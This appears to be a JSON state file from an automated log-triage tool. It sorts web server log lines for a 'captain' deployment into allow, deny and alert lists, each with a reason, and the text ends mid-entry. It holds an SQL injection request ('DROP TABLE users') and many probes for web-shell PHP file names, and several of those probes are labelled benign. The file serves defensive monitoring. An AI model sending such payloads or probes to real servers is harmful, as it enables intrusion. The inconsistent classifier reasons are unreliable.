"2026-03-19T22:31:39.367814706Z" }, "bde87544c793e05696a485bfbd836caae5df4f4939a7629e2c9259e0c910d45e": { "type": "hash", "value": "bde87544c793e05696a485bfbd836caae5df4f4939a7629e2c9259e0c910d45e", "source": "auto", "reason": "Deprecation warning from nginx about outdated http2 listen directive; generally non-malicious and typically low urgency unless expecting config changes.", "original_line": "[warn] \u003cPID\u003e: the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:9", "created_at": "2026-03-19T22:31:38.055644535Z" } }, "prefixes": [ { "type": "prefix", "value": "the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:", "source": "llm", "reason": "Nginx warning about a deprecated configuration directive; non-exploitative and typically routine during upgrades.", "original_line": "[warn] \u003cPID\u003e: the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:173", "created_at": "2026-03-19T22:31:41.333772904Z" } ] } }, "docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp": { "allow": { "hashes": { "17a50cd816dde763167a0c5ccbe42ab3c765c69775daa197c0f98fac4f138e8e": { "type": "hash", "value": "17a50cd816dde763167a0c5ccbe42ab3c765c69775daa197c0f98fac4f138e8e", "source": "auto", "reason": "HTTP 422 on a POST to an API endpoint is a normal client error and commonly seen in regular traffic (invalid payload). Not indicative of attack behavior.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"POST /api/process-class-interest-form HTTP/1.0\" 422 73 \"-\" \"-\" \"2a06:98c0:\u003cNUM\u003e::103, \u003cIP\u003e\"", "created_at": "2026-03-20T02:42:41.386299037Z" }, "1af78ae28d4710a97758c70fae4ccf288ef61671da52c7def9483094623b987c": { "type": "hash", "value": "1af78ae28d4710a97758c70fae4ccf288ef61671da52c7def9483094623b987c", "source": "auto", "reason": "Standard web access log entry with a 404 response. Not indicative of an attack or misconfiguration by itself.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /a5.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:53.473353834Z" }, "1ddc3058f6baafa563b571fcac47f71a2d80c876388e80447c422aa40844344d": { "type": "hash", "value": "1ddc3058f6baafa563b571fcac47f71a2d80c876388e80447c422aa40844344d", "source": "auto", "reason": "Regular HTTP 404 access to a PHP file from a client IP; common in web traffic and not inherently malicious. Could be probing but there is no definitive malicious pattern.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /mh.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:43.803438492Z" }, "1f13130520769e976123acbf6132c610d2d1b074ad3c725a347353cab306d5e1": { "type": "hash", "value": "1f13130520769e976123acbf6132c610d2d1b074ad3c725a347353cab306d5e1", "source": "auto", "reason": "Standard HTTP access log with a 404 response. No evidence of malicious activity in this single line.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /public/ws49.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:11.955476554Z" }, "278c69079b29b5ecd0281e9d685d85541cb0057a1f1e5c343796e2d0a1bdc94c": { "type": "hash", "value": "278c69079b29b5ecd0281e9d685d85541cb0057a1f1e5c343796e2d0a1bdc94c", "source": "auto", "reason": "Normal HTTP 404 response for a GET to a non-existent resource (hehe.php) from a client IP. This is common and not indicative of an attack by itself.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /hehe.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:54.254745293Z" }, "46d8f8efdfd6bce8fd9be09d0c95efa75c1e3dc88c0bd599a45d22316624a51b": { "type": "hash", "value": "46d8f8efdfd6bce8fd9be09d0c95efa75c1e3dc88c0bd599a45d22316624a51b", "source": "auto", "reason": "Normal 404 for a specific path on a web server; no clear malicious indicators. Could be a probe or benign request.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-png.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:11.615734529Z" }, "49862d3639a864bb1dad7b2bc6b90ba4b9e1dfcf6bc14108e97b493d69684b06": { "type": "hash", "value": "49862d3639a864bb1dad7b2bc6b90ba4b9e1dfcf6bc14108e97b493d69684b06", "source": "auto", "reason": "A standard 404 on a GET request for a PHP file from a web server is common and not inherently malicious. No anomalous patterns detected beyond the 404 which is typical for missing resources.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /kj.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:51:46.597266493Z" }, "50b3f38496349cf9d01bb21daa3dc1076e665b3e173ccbad658dca74571df86f": { "type": "hash", "value": "50b3f38496349cf9d01bb21daa3dc1076e665b3e173ccbad658dca74571df86f", "source": "auto", "reason": "Normal HTTP access log showing a 404 for a GET to /admin/index.php. This is common probing behavior but not inherently malicious.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /admin/index.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:28.628049083Z" }, "5679e1a7452cf74d4a13a7d5ebe3d13b02195bc753d9262f300988664075c5f5": { "type": "hash", "value": "5679e1a7452cf74d4a13a7d5ebe3d13b02195bc753d9262f300988664075c5f5", "source": "auto", "reason": "Normal web request resulting in 404 for a PHP file; no evidence of exploitation or malicious activity in isolation.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ms-edit.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:32.231837734Z" }, "61c0cba584d83ca2029f7e888a580aad9bec2ec66ede4fec2b42cd2349220114": { "type": "hash", "value": "61c0cba584d83ca2029f7e888a580aad9bec2ec66ede4fec2b42cd2349220114", "source": "auto", "reason": "Normal HTTP 404 response for a GET request to a non-existent file; consistent with typical web server access logs.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /gettest.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:14.038704925Z" }, "688eee0915ea1369450d46e1c347fe0fbcc943f7e78bc0a135b568e3e00241c8": { "type": "hash", "value": "688eee0915ea1369450d46e1c347fe0fbcc943f7e78bc0a135b568e3e00241c8", "source": "auto", "reason": "Standard HTTP access log with 404 response; no obvious malicious indicators.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /callback.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T13:00:23.667065819Z" }, "702b5540a8e63639138cc475267e86caed76e55139f773db85fb478d87dd61d3": { "type": "hash", "value": "702b5540a8e63639138cc475267e86caed76e55139f773db85fb478d87dd61d3", "source": "auto", "reason": "HTTP 404 for a request to /wp-good.php is a common, non-malicious web server event and appears as routine traffic.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-good.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:30.183823899Z" }, "72b0df9b90742b80a1a01bd3404c8ce5d360e0459b0d2bce7165a6564e75cdb9": { "type": "hash", "value": "72b0df9b90742b80a1a01bd3404c8ce5d360e0459b0d2bce7165a6564e75cdb9", "source": "auto", "reason": "Standard 404 GET request to a public file; appears to be normal client request and not indicative of malicious activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /public/file.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:32.653875362Z" }, "7a18ef3f78833679e7b4e626c2894e6f88757a0a074ecff1bace6f85d27e211f": { "type": "hash", "value": "7a18ef3f78833679e7b4e626c2894e6f88757a0a074ecff1bace6f85d27e211f", "source": "auto", "reason": "Normal HTTP 404 response for a GET request to a PHP file. Could be probing but within normal web access patterns.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws81.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:11.829645023Z" }, "7aca7957eae58ea585e4634b36441f72a66dd631101e741b76d428858fe792d0": { "type": "hash", "value": "7aca7957eae58ea585e4634b36441f72a66dd631101e741b76d428858fe792d0", "source": "auto", "reason": "Standard web server access log showing a 404 for a request to /ws60.php. No evidence of exploitation or authentication issues; likely normal traffic, though could be a probe.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws60.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:50:26.344737383Z" }, "8da8f7891456b0f457d2754e2b79ca1a4245998cc2f56f5d41347fe8adc02b77": { "type": "hash", "value": "8da8f7891456b0f457d2754e2b79ca1a4245998cc2f56f5d41347fe8adc02b77", "source": "auto", "reason": "HTTP 404 on a PHP file is a common, non-malicious access attempt and typical web server behavior. No evidence of anomalous payload.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /amax.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:14.198873755Z" }, "9635ba4adb3a59e76725a085a4803a53b0dcd736a52fecc5612341ec67d8e68a": { "type": "hash", "value": "9635ba4adb3a59e76725a085a4803a53b0dcd736a52fecc5612341ec67d8e68a", "source": "auto", "reason": "HTTP 404 for a non-existent endpoint is common and not inherently malicious; normal web server behavior with no evident exploitation attempts.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /term.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:05.459379436Z" }, "9e20d27655b0ec085820a0a72b5af8624216e15603eebd92d7c75d103b81e455": { "type": "hash", "value": "9e20d27655b0ec085820a0a72b5af8624216e15603eebd92d7c75d103b81e455", "source": "auto", "reason": "Normal HTTP access log entry with a successful response (200) from a frontend service.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET / HTTP/1.0\" 200 \u003cNUM\u003e \"-\" \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.\u003cNUM\u003e.63 Safari/537.36\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T11:13:03.257733334Z" }, "a151ae81b74889c55213e08af27b9eb7f7893ae472ab1251a906e1192c0f931c": { "type": "hash", "value": "a151ae81b74889c55213e08af27b9eb7f7893ae472ab1251a906e1192c0f931c", "source": "auto", "reason": "Regular health-check style HEAD request to the root path returning 200 from UptimeRobot user agent.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"HEAD / HTTP/1.0\" 200 0 \"https://api.admin.kovicloud.com/\" \"Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)\" \"\u003cIP\u003e\"", "created_at": "2026-03-19T22:24:51.931860227Z" }, "ab7c7b4e8596c060712ef61d71c3ad8c74da788df5ef1e0047bf0249bd8f27c8": { "type": "hash", "value": "ab7c7b4e8596c060712ef61d71c3ad8c74da788df5ef1e0047bf0249bd8f27c8", "source": "auto", "reason": "Normal web server access log with a 404 for a non-existent PHP file; typical benign probing or missing resource requests.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /drhunthq.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:51.888976887Z" }, "b2bc335bbc74c7db7c2b9279d29c69f3c1d64147ac6334e930fc55d4d37763ec": { "type": "hash", "value": "b2bc335bbc74c7db7c2b9279d29c69f3c1d64147ac6334e930fc55d4d37763ec", "source": "auto", "reason": "Normal 404 response for a GET to a PHP file; no anomalous behavior detected", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /file.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:57.823577757Z" }, "b721c9503e1a3e593405068ef30d5ea144e6e1ac44ad5d948e7679a4bc2f26cc": { "type": "hash", "value": "b721c9503e1a3e593405068ef30d5ea144e6e1ac44ad5d948e7679a4bc2f26cc", "source": "auto", "reason": "Single 404 for a PHP file in a routine GET request; no evident exploitation, standard web server access log entry", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /clss.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:41.724855139Z" }, "bf5db8a54bc484dd67a1b88e6a5e5ca1d1ffe09198bd5770f3cabb9012ef95c9": { "type": "hash", "value": "bf5db8a54bc484dd67a1b88e6a5e5ca1d1ffe09198bd5770f3cabb9012ef95c9", "source": "auto", "reason": "Standard HTTP 404 access to a PHP page; appears to be a routine web request without evident malicious payload.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /lm15.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:54:02.518410942Z" }, "bf716496bb04bda9ad385994fd1cc21f6051aab029a1f875ed12f4947f11ef7b": { "type": "hash", "value": "bf716496bb04bda9ad385994fd1cc21f6051aab029a1f875ed12f4947f11ef7b", "source": "auto", "reason": "HTTP POST to a public API endpoint returning 200; typical normal operation", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"POST /api/locator-process-form HTTP/1.0\" 200 877 \"-\" \"-\" \"2a06:98c0:\u003cNUM\u003e::103, \u003cIP\u003e\"", "created_at": "2026-03-20T12:45:46.683087248Z" }, "c052660f1d89e46e31e0bd531bca1b96fa1fb6d8bddccca6a34aef47be630fa6": { "type": "hash", "value": "c052660f1d89e46e31e0bd531bca1b96fa1fb6d8bddccca6a34aef47be630fa6", "source": "auto", "reason": "Standard HTTP access log with 404 response; no obvious malicious indicators. Could indicate probing but common in normal traffic.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /t.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:51.116398069Z" }, "de07ea5b55fa88893b8f7370dafb6dca86e070a0136cac5ef0c6d276fda13fd1": { "type": "hash", "value": "de07ea5b55fa88893b8f7370dafb6dca86e070a0136cac5ef0c6d276fda13fd1", "source": "auto", "reason": "HTTP 422 indicates a client-side validation error on a normal API request; this is routine rather than malicious.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"POST /api/process-class-interest-form HTTP/1.0\" 422 148 \"-\" \"-\" \"2a06:98c0:\u003cNUM\u003e::103, \u003cIP\u003e\"", "created_at": "2026-03-20T05:48:50.483048199Z" }, "e6e88005f015460900cb2e44f409b3f9c29440a5940c0828ef0cad4f91cb4b4d": { "type": "hash", "value": "e6e88005f015460900cb2e44f409b3f9c29440a5940c0828ef0cad4f91cb4b4d", "source": "auto", "reason": "Standard HTTP access log line with a 200 response for the root path from a GPTBot user agent; typical benign traffic.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET / HTTP/1.0\" 200 \u003cNUM\u003e \"-\" \"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T14:59:57.448232411Z" }, "e9d8a5d6bf7aa3c19814d7f8bec7ea0a265417d8899187481af4357b1f003160": { "type": "hash", "value": "e9d8a5d6bf7aa3c19814d7f8bec7ea0a265417d8899187481af4357b1f003160", "source": "auto", "reason": "Regular HTTP access log resulting in 404 for a missing path (abrand.php) from a known IP; not indicative of attack", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /abrand.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:30.515816295Z" }, "eae0c3f4ccedab1aa2d32330f648f18823e31bed31132b5a1f2f47995e145c92": { "type": "hash", "value": "eae0c3f4ccedab1aa2d32330f648f18823e31bed31132b5a1f2f47995e145c92", "source": "auto", "reason": "Normal web server access log showing a standard GET request with a 404 response; nothing abnormal detected.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-blog.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:49.85073662Z" }, "f1c7891b26f2820495a2feb93bdac5e773416206b1ff829f08819e67af950e41": { "type": "hash", "value": "f1c7891b26f2820495a2feb93bdac5e773416206b1ff829f08819e67af950e41", "source": "auto", "reason": "Normal web server access log with a 404 not found response; no malicious indicators.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ws80.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:40.323844194Z" } } }, "deny": { "hashes": { "53fa779c3b5615c87b2544cb3951db8622bce761ec95fd4203c453b242e8271d": { "type": "hash", "value": "53fa779c3b5615c87b2544cb3951db8622bce761ec95fd4203c453b242e8271d", "source": "auto", "reason": "HTTP request contains an SQL injection payload in the URL (id=1;DROP+TABLE+users). This is a known attack pattern.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /?id=1;DROP+TABLE+users HTTP/1.0\" 200 \u003cNUM\u003e \"-\" \"curl/8.5.0\" \"\u003cIP\u003e\"", "created_at": "2026-03-19T23:59:49.034138326Z" } } }, "alert": { "hashes": { "0264a86308220a1d05fc72f7855a50e2e37be989fed4e42ebe792fbb9b281726": { "type": "hash", "value": "0264a86308220a1d05fc72f7855a50e2e37be989fed4e42ebe792fbb9b281726", "source": "auto", "reason": "HTTP 404 for a direct PHP file (/144.php) from a client IP; could indicate probing or automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /144.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:36.920576321Z" }, "068438ed94b458941964ca17e456a77afcb05fd4e4ce47dbdbe1b12d16973fdd": { "type": "hash", "value": "068438ed94b458941964ca17e456a77afcb05fd4e4ce47dbdbe1b12d16973fdd", "source": "auto", "reason": "HTTP 404 for a suspicious path bolt.php suggests a potential probing or exploit attempt against a CMS-like endpoint.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /bolt.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:53:47.159642791Z" }, "07e42072bac68c127ef25967975df3c94e1f785816a22b2175dd69bb740ca20d": { "type": "hash", "value": "07e42072bac68c127ef25967975df3c94e1f785816a22b2175dd69bb740ca20d", "source": "auto", "reason": "HTTP GET to /fs.php with 404 could indicate probing for vulnerabilities; not definitive but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /fs.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:26.319208507Z" }, "0ce2daff87c714800910f418eb91750de60617dfc1fa97a6f69ca5d7cebc8acb": { "type": "hash", "value": "0ce2daff87c714800910f418eb91750de60617dfc1fa97a6f69ca5d7cebc8acb", "source": "auto", "reason": "HTTP GET to a PHP file (ioxi.php) returning 404 can indicate probing for vulnerable scripts or misconfigured endpoints.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ioxi.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:41.111377762Z" }, "0fd3a1a8558bd00f146f6061c8582055cc8494e0b5517d23a99573efe3aabe01": { "type": "hash", "value": "0fd3a1a8558bd00f146f6061c8582055cc8494e0b5517d23a99573efe3aabe01", "source": "auto", "reason": "A GET request to wp-content/radio.php returning 404 suggests probing for vulnerable script(s). This pattern is common in vulnerability scans.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-content/radio.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T13:00:13.016572116Z" }, "0fdd9f103df84cd53a863b22e209a8ca1f706a0f4942730822a022594b9553c4": { "type": "hash", "value": "0fdd9f103df84cd53a863b22e209a8ca1f706a0f4942730822a022594b9553c4", "source": "auto", "reason": "Access to a potential admin path (admin-footer.php) returning 404 suggests probing for admin endpoints. Not definitively malicious but warrants scrutiny.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /admin-footer.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:19.947784119Z" }, "10d38b01ffdc2c4987bdb8fa886319f564eae3a9a6ac8336a8c17cd4c7cabdc6": { "type": "hash", "value": "10d38b01ffdc2c4987bdb8fa886319f564eae3a9a6ac8336a8c17cd4c7cabdc6", "source": "auto", "reason": "HTTP GET to a likely probe path (ccs.php) returning 404 could indicate scripted scanning or probing activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ccs.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:34.353381857Z" }, "1972803201a3ee612153263211b1d964c6a46fbebbc51cee157dbebfc5dae1c2": { "type": "hash", "value": "1972803201a3ee612153263211b1d964c6a46fbebbc51cee157dbebfc5dae1c2", "source": "auto", "reason": "Access to a PHP file returning 404 suggests potential probing for web shell or vulnerable paths.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /xwx1.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:37.442288768Z" }, "1a4c23ac7c2e9d1e6cd8a3f8d6dda3ece7201583fc706bbcd56c7deed640304f": { "type": "hash", "value": "1a4c23ac7c2e9d1e6cd8a3f8d6dda3ece7201583fc706bbcd56c7deed640304f", "source": "auto", "reason": "Er access to a PHP file path /sa.php7 returning 404 can indicate probing for vulnerable PHP endpoints.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /sa.php7 HTTP/1.0\" 404 \u003cNUM\u003e \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:52:24.059502096Z" }, "1d8e5a3d8453c6ec2a5944e266b7d24c9590a7c6fd810e38a0bec3a6f0c4a674": { "type": "hash", "value": "1d8e5a3d8453c6ec2a5944e266b7d24c9590a7c6fd810e38a0bec3a6f0c4a674", "source": "auto", "reason": "GET request for a PHP file that does not exist (404) from external IP, indicating a potential probe or automated scanning.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /bgymj.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:58:58.53241627Z" }, "231adf8586ed15428779ca8a07262bd71664c94b62e29a748a13725a2a615b7e": { "type": "hash", "value": "231adf8586ed15428779ca8a07262bd71664c94b62e29a748a13725a2a615b7e", "source": "auto", "reason": "HTTP 404 for /ggb.php suggests probing for a potential PHP file; could be automated scanning", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ggb.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:47:42.672426524Z" }, "254d448d914679ac9deabeefd5946c3dfa4f5186a7339bba46c9217901595ca7": { "type": "hash", "value": "254d448d914679ac9deabeefd5946c3dfa4f5186a7339bba46c9217901595ca7", "source": "auto", "reason": "HTTP 404 to wp-blog-header.php suggests probing for WordPress headers; could be automated scanner activity.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-blog-header.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:56.602026535Z" }, "293da797e81a2753e7a4d3382376d7b871ce59f0a3f041dadfd722110ec64059": { "type": "hash", "value": "293da797e81a2753e7a4d3382376d7b871ce59f0a3f041dadfd722110ec64059", "source": "auto", "reason": "A GET request for /nw.php returning 404 could indicate probing or attempted access to hidden/admin resources; not definitive malicious activity but warrants attention.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /nw.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:54:42.544789158Z" }, "2a1abcb9fb95cbbadbf08214a567fd23e01cceeaa430d0043a2864b7c72d3b02": { "type": "hash", "value": "2a1abcb9fb95cbbadbf08214a567fd23e01cceeaa430d0043a2864b7c72d3b02", "source": "auto", "reason": "HTTP 404 for a specific PHP file path (ioxi-o.php) from an external IP; potential probing or misconfigured route, not clearly malicious but warrants monitoring", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /ioxi-o.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:19.004698652Z" }, "2bc5e1840705c351e933745f32e775ec7cecaf678d6d2e5021ccf93fbca94fd6": { "type": "hash", "value": "2bc5e1840705c351e933745f32e775ec7cecaf678d6d2e5021ccf93fbca94fd6", "source": "auto", "reason": "Access to /155.php returning 404 could indicate probing for PHP files common in automated scans; not definitive but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /155.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:48:35.964409389Z" }, "332afeb4012335ab2782e23985a1020911937b786ecdd7be80faec17f9f16246": { "type": "hash", "value": "332afeb4012335ab2782e23985a1020911937b786ecdd7be80faec17f9f16246", "source": "auto", "reason": "Unusual access to inputs.php resulting in 404 may indicate probing for vulnerable PHP endpoints; pattern not anchored, but notable due to the requested path.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /inputs.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:57:45.176946558Z" }, "3656536a9b193ba07413e4ad7ee982037d1f416305947d1b5148a10483a3e192": { "type": "hash", "value": "3656536a9b193ba07413e4ad7ee982037d1f416305947d1b5148a10483a3e192", "source": "auto", "reason": "HTTP 404 for a request to /wp-ssfc.php suggests a probable probe for WordPress-related vulnerability files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /wp-ssfc.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:46:52.165808314Z" }, "3a610ce7137eb9a5dedad702df04cdd3ca101463bf05f0617f0ea5b695e1c61a": { "type": "hash", "value": "3a610ce7137eb9a5dedad702df04cdd3ca101463bf05f0617f0ea5b695e1c61a", "source": "auto", "reason": "HTTP GET to /sid3.php with 404 indicates a potential probe or misconfigured path.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /sid3.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:56:37.017129279Z" }, "3c344e3371ab580675def950fe561bee263c28e8764e882b3e1fa69189288f16": { "type": "hash", "value": "3c344e3371ab580675def950fe561bee263c28e8764e882b3e1fa69189288f16", "source": "auto", "reason": "404 for motu.php suggests probing for a potentially sensitive PHP file commonly targeted in site enumeration or vulnerability scans. Not definitive malicious activity, but warrants alerting and monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /motu.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:59:46.701619257Z" }, "42c0dc43112970cbea20e6d1820e8ce9f98a05b8b48bf0dc5d9d5692a1371e06": { "type": "hash", "value": "42c0dc43112970cbea20e6d1820e8ce9f98a05b8b48bf0dc5d9d5692a1371e06", "source": "auto", "reason": "Access to /bnm.php returned 404, which can indicate probing for vulnerable/php info endpoints. Not clearly malicious but warrants monitoring.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /bnm.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:54:35.340323894Z" }, "43830f345e52d86e137e88cedfffe919336474548dc27a3e6e45e939692c788f": { "type": "hash", "value": "43830f345e52d86e137e88cedfffe919336474548dc27a3e6e45e939692c788f", "source": "auto", "reason": "A 404 response for /cu.php in combination with a GET request from an internal IP suggests a potential probe or automated scanning for known vulnerable PHP files.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /cu.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:49:18.927953293Z" }, "4404f3f3333378dc77e8b15bacd0126dfd3b747af5719624c0687ff587d1bfc8": { "type": "hash", "value": "4404f3f3333378dc77e8b15bacd0126dfd3b747af5719624c0687ff587d1bfc8", "source": "auto", "reason": "HTTP 404 for /s.php from external IP suggests probing or a web resource lookup pattern common in vulnerability scans.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /s.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:54:52.411566898Z" }, "4be03e023a3f2f4aae361e3122a4805a02123bb2ca3c52051b7dee2bd2696884": { "type": "hash", "value": "4be03e023a3f2f4aae361e3122a4805a02123bb2ca3c52051b7dee2bd2696884", "source": "auto", "reason": "A single 404 for /xsas.php suggests a targeted probe for a potentially sensitive PHP file.", "original_line": "\u003cIP\u003e - - \u003cTS\u003e \"GET /xsas.php HTTP/1.0\" 404 146 \"-\" \"-\" \"\u003cIP\u003e\"", "created_at": "2026-03-20T12:55:13.363143319Z" }, "4e75c4d2ade7a6809a5b885cc9bd4cfeca974ffb66ced47c9ef8d2cab79db701": { "type": "hash", "value": "4e75c4d2ade7a6809a5b885cc9bd4cfeca974ffb66ced47c9ef8d2cab79db701", "source": "auto", "reason": "A 404 for a likely filename (hots.php) from a web request can indicate probing for common PHP scripts or 